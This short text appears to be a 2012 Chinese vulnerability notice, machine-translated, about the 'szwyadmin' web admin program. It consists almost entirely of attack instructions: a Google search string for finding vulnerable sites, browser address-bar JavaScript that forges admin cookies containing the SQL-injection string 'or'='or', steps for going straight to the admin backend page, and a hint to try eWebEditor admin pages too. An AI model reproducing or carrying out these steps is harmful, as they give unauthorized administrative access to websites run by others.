szwyadmin program vulnerability to get shell-vulnerability warning-the black bar safety net

2012-09-25T00:00:00
ID MYHACK58:62201235025
Type myhack58
Reporter 佚名
Modified 2012-09-25T00:00:00

Description

First of all, we in Google search for keywords

Keywords:inurl:szwyadmin/login. asp

Any open a search results, open the login interface in the address bar enter the following code:

Code: javascript:alert(document. cookie="adminuser="+escape("'or'='or'"));

javascript:alert(document. cookie="adminpass="+escape("'or'='or'"));

javascript:alert(document. cookie="admindj="+escape("1"));

Close this page

At the time you open the login screen

In the address bar login. asp to admin_index. asp

Directly into the background.

You can also try

ewebeditor/admin_login. asp